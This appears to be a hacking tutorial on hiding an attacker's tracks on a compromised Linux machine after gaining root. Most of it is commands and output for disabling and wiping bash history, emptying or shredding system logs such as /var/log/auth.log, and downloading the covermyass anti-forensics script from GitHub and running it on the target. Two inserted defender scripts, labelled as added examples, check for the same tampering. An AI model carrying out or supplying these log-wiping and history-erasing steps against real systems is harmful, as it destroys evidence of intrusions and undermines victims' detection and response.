As a hacker, the final stage of exploitation is clearing your tracks: wiping all traces of your activity and the logs that record it so that you are not detected. It is especially critical for persistence if the attacker intends to come back to the target later.
To show you the basics of hiding your tracks, we'll first compromise a target and then explore some of the techniques used to delete Bash history, clear logs, and stay hidden after exploiting a Linux system. You can watch our Cyber Weapons Lab video below, which walks through this guide, or skip ahead to the written steps.
Step 1: Compromise a target
The first thing we need to do is exploit the target. We can use command injection to take advantage of the way the server handles OS commands and get a shell. We also want to upgrade that shell to a fully interactive one; this makes it easier to work in general and gives us tab completion and terminal history.
After that, we can escalate our privileges to root so that we can take better advantage of the system to go unnoticed.
Step 2: Create an easy-to-delete hidden folder
Once we have root access, we can create a hidden folder to work out of and keep any scripts or files in. It won't fool anyone except the most noobie admin, but another layer of discretion certainly doesn't hurt. First, let's find all world-writable directories with the following command:
root@target:/# find / -perm -222 -type d 2>/dev/null
/dev/shm
/var/lock
/var/lib/php5
/var/tmp
/var/www/dav
/var/www/twiki/data/Sandbox
/var/www/twiki/data/Main
/var/www/twiki/data/Know
/var/www/twiki/data/TWiki
/var/www/twiki/data/_default
/var/www/twiki/data/Trash
/var/www/twiki/pub/Sandbox
/var/www/twiki/pub/Main
/var/www/twiki/pub/Know
/var/www/twiki/pub/Know/IncorrectDllVersionW32PTH10DLL
/var/www/twiki/pub/TWiki
/var/www/twiki/pub/TWiki/TWikiDocGraphics
/var/www/twiki/pub/TWiki/TWikiTemplates
/var/www/twiki/pub/TWiki/TWikiLogos
/var/www/twiki/pub/TWiki/PreviewBackground
/var/www/twiki/pub/TWiki/FileAttachment
/var/www/twiki/pub/TWiki/WabiSabi
/var/www/twiki/pub/Trash
/var/www/twiki/pub/icn
/tmp
/tmp/.ICE-unix
/tmp/.X11-unix
We can create a hidden folder with the mkdir command and by prefixing the name with a period:
root@target:/# mkdir /dev/shm/.secret
If we list the contents of /dev/shm now, nothing will appear:
root@target:/# ls -l /dev/shm/
total 0
Only with the -a switch, which shows all files and folders, does it show up:
root@target:/# ls -la /dev/shm/
total 0
drwxrwxrwt  3 root root    60 2019-06-19 13:49 .
drwxr-xr-x 13 root root 13480 2019-06-19 13:41 ..
drwxr-xr-x  2 root root    40 2019-06-19 13:49 .secret
And to delete the folder once we're done on the machine, use the rmdir command:
root@target:/# rmdir /dev/shm/.secret/
Step 3: Delete the bash history
Bash keeps a list of the commands used in the current session in memory, so it's important to clear them to cover your tracks. We can view the current history with the history command:
root@target:/# history
    1  cd /
    2  ls
    3  find / -perm -222 -type d 2>/dev/null
    4  cd /dev/shm/
    5  cd /
    6  mkdir /dev/shm/.secret
    7  ls -l /dev/shm/
    8  ls -la /dev/shm/
    9  ls
   10  rmdir /dev/shm/.secret/
   11  history
When the session ends, the commands are written to the file named by the HISTFILE environment variable, usually .bash_history. We can echo it to see the location:
root@target:/# echo $HISTFILE
/root/.bash_history
We can use the unset command to delete the variable:
root@target:/# unset HISTFILE
Now if we echo it again, nothing will show up:
root@target:/# echo $HISTFILE
We can also prevent the command history from being saved at all by sending it to /dev/null. Set the variable to it directly, or do the same with the export command:
root@target:/# export HISTFILE=/dev/null
And the history is now being sent to /dev/null (nowhere):
root@target:/# echo $HISTFILE
/dev/null
We can set the number of commands to be stored during the current session to 0 using the HISTSIZE variable, either directly or with the export command:
root@target:/# export HISTSIZE=0
We can also change the number of lines allowed in the history file with the HISTFILESIZE variable. Set this to 0, directly or with export:
root@target:/# export HISTFILESIZE=0
The set command can also be used to change shell options. Use the following command to turn off the history option:
root@target:/# set +o history
And to turn it back on:
root@target:/# set -o history
Likewise, the shopt command can be used to change shell options. Use the following command to turn off history:
root@target:/# shopt -ou history
And to turn it back on:
root@target:/# shopt -os history
While executing commands on the target system, we can sometimes prevent them from being saved in history by starting the command with a leading space:
root@target:~# cat /etc/passwd
This technique does not always work: it depends on the HISTCONTROL variable being set to ignorespace or ignoreboth on that system.
We can also just clear the history with the -c switch:
root@target:~# history -c
Then write the now-empty history out to the history file with the -w switch:
root@target:~# history -w
Note that -c on its own only clears the history of the current session. To make absolutely sure that the history is cleared when leaving a session, the following command is useful:
root@target:/# cat /dev/null > ~/.bash_history && history -c && exit
We can also use the kill command to exit the session without saving the history:
root@target:/# kill -9 $$
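From the defender's side, every trick in this step leaves a fingerprint in the user's shell start-up files or in the history file itself. The following check is an added example, not code from the original post: audit_history (a hypothetical name) scans one home directory for those settings and assumes only POSIX sh plus grep -E, sed and readlink.

```shell
# Added example (not from the original post): audit one user's bash start-up
# files and history file for the history-disabling settings shown in Step 3.
# audit_history is a hypothetical name; it assumes POSIX sh plus grep -E,
# sed and readlink. Prints one line per finding plus "findings: N", and
# returns non-zero when anything suspicious was found.
audit_history() {
    home="$1"
    findings=0
    # Patterns for: HISTFILE=/dev/null, unset HISTFILE, HISTSIZE=0 /
    # HISTFILESIZE=0, set +o history, shopt -ou history
    pat="HISTFILE=[\"']?/dev/null"
    pat="$pat|unset[[:space:]]+HISTFILE"
    pat="$pat|HIST(FILE)?SIZE=[\"']?0[\"']?([^0-9]|\$)"
    pat="$pat|set[[:space:]]+\\+o[[:space:]]+history"
    pat="$pat|shopt[[:space:]]+-ou[[:space:]]+history"
    for rc in .bashrc .bash_profile .bash_login .profile; do
        f="$home/$rc"
        [ -f "$f" ] || continue
        # Drop comments first so a commented-out HISTSIZE=0 is not a hit.
        if sed 's/#.*//' "$f" | grep -Eq "$pat"; then
            echo "SUSPICIOUS: $f disables or redirects bash history"
            findings=$((findings + 1))
        fi
    done
    hist="$home/.bash_history"
    if [ -L "$hist" ] && [ "$(readlink "$hist")" = /dev/null ]; then
        # ln -s /dev/null ~/.bash_history is a common persistent variant
        echo "SUSPICIOUS: $hist is a symlink to /dev/null"
        findings=$((findings + 1))
    elif [ -f "$hist" ] && [ ! -s "$hist" ]; then
        # history -c && history -w, or cat /dev/null > ~/.bash_history
        echo "SUSPICIOUS: $hist exists but is empty"
        findings=$((findings + 1))
    fi
    echo "findings: $findings"
    [ "$findings" -eq 0 ]
}

# Run directly against a home directory: sh audit_history.sh /root
if [ $# -gt 0 ]; then audit_history "$1"; fi
```

Run it over every home directory in /etc/passwd and alert on a non-zero exit; an empty .bash_history for an account that logs in interactively is worth a look on its own.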
Step 4: Delete the log files
In addition to Bash history, log files must also be cleared to go unnoticed. Here are some common log files and what they contain:
- /var/log/auth.log: authentication
- /var/log/cron.log: cron jobs
- /var/log/maillog: mail
- /var/log/httpd: Apache
Of course, we can simply delete a log with the rm command:
root@target:/# rm /var/log/auth.log
But a missing log file will likely raise red flags, so it's better to empty the file rather than delete it completely. We can use the truncate command to reduce its size to 0:
root@target:/# truncate -s 0 /var/log/auth.log
Keep in mind that truncate is not present on every system.
We can achieve nearly the same thing by echoing an empty string into the file (this leaves a single newline behind):
root@target:/# echo '' > /var/log/auth.log
Or with just the redirection operator by itself, which empties the file:
root@target:/# > /var/log/auth.log
We can also copy /dev/null over it:
root@target:/# cat /dev/null > /var/log/auth.log
Or use the tee command:
root@target:/# true | tee /var/log/auth.log
We can also use the dd command to write nothing into the log file:
root@target:/# dd if=/dev/null of=/var/log/auth.log
0+0 records in
0+0 records out
0 bytes (0 B) copied, 6.1494e-05 s, 0.0 kB/s
The shred command can be used to overwrite a file with meaningless binary data:
root@target:/# shred /var/log/auth.log
We can even tack on -z, which adds a final pass of zeros to hide the evidence of shredding, and -u, which truncates and removes the file afterwards:
root@target:/# shred -zu /var/log/auth.log
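Each of the emptying methods above leaves a recognisable state behind (a missing file, a zero-byte file, a single newline, or a file full of random bytes), which is what a defender should look for. The following classifier is an added example, not code from the original post: audit_log (a hypothetical name) inspects one log file and assumes only POSIX sh plus head, od, tr and wc.

```shell
# Added example (not from the original post): classify one log file by the
# tampering patterns shown in Step 4. audit_log is a hypothetical name; it
# assumes POSIX sh plus head, od, tr and wc. Exit status 0 = looks like an
# intact text log, 1 = suspicious (the reason is printed).
audit_log() {
    f="$1"
    if [ ! -e "$f" ]; then
        echo "$f: MISSING (deleted with rm?)"; return 1
    fi
    size=$(wc -c < "$f" | tr -d ' ')
    # truncate -s 0, > file, cat /dev/null > file, dd if=/dev/null, true | tee
    if [ "$size" -eq 0 ]; then
        echo "$f: EMPTY (truncated?)"; return 1
    fi
    # echo '' > file leaves exactly one newline (byte 0x0a) behind
    if [ "$size" -eq 1 ] && [ "$(od -An -tx1 "$f" | tr -d ' \n')" = 0a ]; then
        echo "$f: contains only a newline (echo '' > file?)"; return 1
    fi
    # shred fills the file with random bytes; a genuine text log is almost
    # entirely printable ASCII, so count non-text bytes in a 4 KiB sample
    sample=$(head -c 4096 "$f" | wc -c | tr -d ' ')
    bad=$(head -c 4096 "$f" | LC_ALL=C tr -d '[:print:][:space:]' | wc -c | tr -d ' ')
    if [ $((bad * 100 / sample)) -gt 30 ]; then
        echo "$f: $bad of $sample sampled bytes are non-text (shred?)"; return 1
    fi
    echo "$f: looks intact ($size bytes)"
    return 0
}

# Run directly: sh audit_log.sh /var/log/auth.log /var/log/cron.log ...
for logfile in "$@"; do audit_log "$logfile"; done
```

Pair this with remote log forwarding: a log that is emptied on the host cannot be recovered locally, but the copy on the syslog collector still shows what ran before the wipe.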
Step 5: Use a tool to make sure things are cleared
To increase the likelihood of our activity on the target going undiscovered, we can use a tool to make sure everything is cleared. Covermyass is a script that automates many of the steps we've already covered, including clearing log files and disabling Bash history.
We can get the script from GitHub with wget (assuming we can access the internet on the target, otherwise it has to be manually transferred):
root@target:/# wget https://raw.githubusercontent.com/sundowndev/covermyass/master/covermyass
Go to a writable folder and use chmod to make it executable:
root@target:/tmp# chmod +x covermyass
Then we can run it:
root@target:/tmp# ./covermyass
Welcome to Cover my ass tool !
Select an option :
1) Clear logs for user root
2) Permenently disable auth & bash history
3) Restore settings to default
99) Exit tool
>
We get a custom prompt with a few options to choose from. Let’s select the first one to clear the logs:
> 1
[+] /var/log/messages cleaned.
[+] /var/log/auth.log cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned.
[+] History file deleted.
Reminder: your need to reload the session to see effects. Type exit to do so.
We can also disable Bash and auth history with option 2:
> 2
[+] Permanently sending /var/log/auth.log to /dev/null
[+] Permanently sending bash_history to /dev/null
[+] Set HISTFILESIZE & HISTSIZE to 0
[+] Disabled history library
Permenently disabled bash log.
And in case you need to clean everything up quickly, just add the now argument to the command:
root@target:/tmp# ./covermyass now
[+] /var/log/messages cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned.
[+] History file deleted.
Reminder: your need to reload the session to see effects. Type exit to do so.
Today we've explored several techniques used to hide traces and go unnoticed on a compromised machine. We've covered ways to disable and delete Bash history, methods to clear log files, and used the Covermyass tool to make sure our activity on the target was cleared. There are other ways to remove certain traces of an attack, such as using Metasploit, using shell scripting, or doing it on a hacked Windows machine, but the above should be all you need for a basic Linux computer.